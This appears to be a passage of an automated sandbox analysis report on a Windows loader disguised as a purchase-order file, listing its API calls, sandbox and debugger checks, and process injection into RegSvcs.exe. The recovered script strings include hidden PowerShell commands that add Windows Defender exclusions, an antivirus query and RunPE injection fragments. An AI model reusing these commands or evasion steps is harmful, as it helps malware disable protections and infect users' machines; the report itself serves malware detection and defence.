Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A9C642 FindFirstFileExW,	20_2_00A9C642
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AD72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	20_2_00AD72E9
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AD7248 FindFirstFileW,FindClose,	20_2_00AD7248
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ACDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00ACDB69

Source: C:\Users\user\Desktop\PO3311926.exe

Code function: 0_2_00BBE6A3 VirtualQuery,GetSystemInfo,

0_2_00BBE6A3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe
Source: sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exe
Source: nngqrvwq.xl.8.dr	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: sdadbtvsh.bin.exe, 00000023.00000003.2209331519.000000000175B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954798613.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VBoxTray.exeM
Source: sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Then2JI
Source: sdadbtvsh.bin.exe, 00000014.00000002.1753584117.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VboxService.exei
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1955630909.000000000158F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") Thennd.x
Source: nngqrvwq.xl.8.dr	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1502498229.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") Then37
Source: RegSvcs.exe, 0000000F.00000002.2614141887.000000000D224000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sdadbtvsh.bin, 00000008.00000003.1599977444.000000000173F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exeM
Source: sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe+
Source: sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Thenp7h
Source: sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") ThenG4
Source: sdadbtvsh.bin, 00000008.00000003.1599977444.000000000173F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe/
Source: sdadbtvsh.bin, 00000008.00000003.1599039739.0000000001739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VboxService.exe&Zo
Source: sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: nngqrvwq.xl.8.dr	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then60
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1599039739.0000000001739000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1747808847.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VBoxTray.exe
Source: sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VboxService.exeS
Source: sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1953788447.00000000015A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") ThenMY
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1953788447.00000000015A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then60
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exeZ
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VboxService.exe
Source: sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Theni
Source: sdadbtvsh.bin.exe, 00000023.00000003.2209677560.000000000173F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000002.2210405778.0000000001742000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") Then0.V
Source: sdadbtvsh.bin.exe, 00000014.00000002.1753337801.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1752343208.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: nngqrvwq.xl.0.dr, nngqrvwq.xl.8.dr	Binary or memory string: If ProcessExists("VBoxTray.exe") Then

Source: C:\Users\user\Desktop\PO3311926.exe

API call chain: ExitProcess graph end node

graph_0-23785

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 15_2_0EE33800 LdrInitializeThunk,

15_2_0EE33800

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_0060F3FF BlockInput,

8_2_0060F3FF

Source: C:\Users\user\Desktop\PO3311926.exe

Code function: 0_2_00BBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00BBF838

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_00595D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00595D78

Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BC7DEE mov eax, dword ptr fs:[00000030h]	0_2_00BC7DEE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B5078 mov eax, dword ptr fs:[00000030h]	8_2_005B5078
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A85078 mov eax, dword ptr fs:[00000030h]	20_2_00A85078

Source: C:\Users\user\Desktop\PO3311926.exe

Code function: 0_2_00BCC030 GetProcessHeap,

0_2_00BCC030

Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BBF838
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BBF9D5 SetUnhandledExceptionFilter,	0_2_00BBF9D5
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BBFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00BBFBCA
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BC8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BC8EBD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005C29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_005C29B2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_005B0BCF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B0D65 SetUnhandledExceptionFilter,	8_2_005B0D65
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005B0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_005B0FB1
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A929B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_00A929B2
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A80BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_00A80BCF
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A80D65 SetUnhandledExceptionFilter,	20_2_00A80D65
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A80FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_00A80FB1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1340000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1300000 protect: page execute and read and write
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DA0000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1340000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1300000 value starts with: 4D5A
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DA0000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1340000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1053000	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3FB000	Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1300000
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1130000
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DA0000
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A0A000

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

8_2_005F1A91

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_00593312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

8_2_00593312

Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")o7	memstr_db719c70-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc:/	memstr_52d311fb-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endifwt	memstr_1adea4ad-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)	memstr_48a30753-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)ckb	memstr_7865dfaf-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)9hh	memstr_a469d4bb-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)5z	memstr_d316f5f9-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)ad	memstr_fa9672a1-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($var94, 1, "current_user")a(	memstr_f885897a-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($binbuffer, 1, $binary)	memstr_2b5dc15c-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 877b273k	memstr_ccf5875e-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($var93, 1, "0x401fffff")}(	memstr_4ec5496e-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ppointer = dllstructgetptr($tbinary)	memstr_bdc18e6f-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $idata = dllstructgetdata($tenries, 1, $i)	memstr_a2719535-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_iswow64process($handlerpro)	memstr_f2894a66-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ppeb = dllstructgetdata($tcontext, "ebx")	memstr_ddfa9af3-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ppeb = dllstructgetdata($tcontext, "rdx")	memstr_4b39e8ef-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if @error then return seterror(3, 0, false)	memstr_a9cd552d-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $idelta = $paddressnew - $paddressold	memstr_9f8e7e91-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $inumberofentries = ($isizeofblock - 8) / 2	memstr_a6350ff9-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss = stringreplace($ssssss, "/", "0")	memstr_b71ffba6-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2y$5)	memstr_42e24c29-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $isizeofrawdata, $ppointertorawdatajwo	memstr_7347109e-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $pmodule = dllstructgetptr($tmodule)	memstr_9ba38748-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 029mujyu56dqv8iye)<	memstr_aaf46e8f-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1l68fhh2nt3yvw9kku4fnp2	memstr_f0264e07-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: okab6221132e57hr423	memstr_16c221f0-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zf43tpn47s51o5454d6	memstr_3e6806b2-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 882t0k54i8t9ai5a)	memstr_27b11c54-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: y0a8yy0hflh848qg	memstr_dd5cfb6c-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 332ke	memstr_4d7a73e7-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k763139foz4_)	memstr_9d23a726-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9r9b5quscc091oj0k23	memstr_854f03b9-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 5637s4z0o52bvt5u)	memstr_94ea1ef3-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $tenries, $idata, $taddress51	memstr_224a0319-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $iflag = 3 + 7 * $fimagex64oy	memstr_d69592a3-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zd^}h	memstr_6a162025-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i)"k?	memstr_1bb8f79a-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: td00133	memstr_1b950a3e-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cyx04n6ph39ikt68jl5obfa47w4	memstr_cbeae223-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 5p69k4zs5adqm	memstr_6320f77b-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ~n.a@	memstr_c859f5f1-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sq8hx3s2n81	memstr_92d937b8-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b1t5uu	memstr_8ffeddff-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 7o2a89423m035xwncaz6uebu05ovgy454k2v	memstr_78d0121f-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $var106 = dllstructgetptr($var93)	memstr_a4d413c7-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $var108 = dllstructgetptr($var95)	memstr_509da4ca-f
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: for $i = 1 to $inumberofsectionse9	memstr_fcafe5cf-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if @error or $acall[0] = -1 then	memstr_73efa1ad-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func __runpe($binary, $sexemodule)	memstr_a84fb245-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kgjjx8k1rj45*	memstr_359486ee-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0jv4a145f3j6t12qjlq0g7dob790ff	memstr_55cf6d1c-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 29563ie7t2142u6	memstr_00c957ae-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __runpe($bbinaryimage, $sexemodule)	memstr_6b023c3f-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 3^lm*#	memstr_a7880254-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'ke5r	memstr_695c8843-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($var93, 6, "1")'	memstr_08559960-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 58a05f85vrqpzyc70uhll	memstr_1f220191-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($var93, 7, "0")	memstr_85ce0bbb-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ^kaxr%d	memstr_9728b166-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kiqs*	memstr_4a8dbbfb-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0x40fdh57of7cra	memstr_84ed0d66-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: g61a0z6b9gb	memstr_afd6d3fd-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0xs0691ov5oonqn86m456l139x0	memstr_2aef0417-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 864rodt	memstr_b7fa1220-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i@-?u\	memstr_952ea3f6-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t1c'	memstr_c583d097-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4itb9a3497r8wky	memstr_97a3b755-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f08s6n9478yz7x	memstr_514e286f-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: osq^f	memstr_59ba1039-0
